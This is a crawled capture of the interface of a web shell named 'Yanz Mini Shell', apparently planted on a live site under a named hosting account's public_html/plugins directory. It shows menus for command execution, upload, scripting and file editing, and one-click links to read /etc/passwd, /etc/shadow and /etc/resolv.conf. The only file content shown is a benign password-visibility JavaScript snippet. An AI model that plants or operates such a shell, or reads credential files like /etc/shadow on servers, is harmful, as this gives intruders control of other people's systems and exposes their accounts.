Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
select2
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
/*======================== password show hide js ==========================*/ let passwordInput = document.getElementById('txtPassword'), toggle = document.getElementById('btnToggle'), icon = document.getElementById('eyeIcon'); function togglePassword() { if (passwordInput.type === 'password') { passwordInput.type = 'text'; icon.classList.add("iconly-Show"); } else { passwordInput.type = 'password'; icon.classList.remove("iconly-Show"); } } toggle.addEventListener('click', togglePassword, false);
Free Space : 11152920576 Byte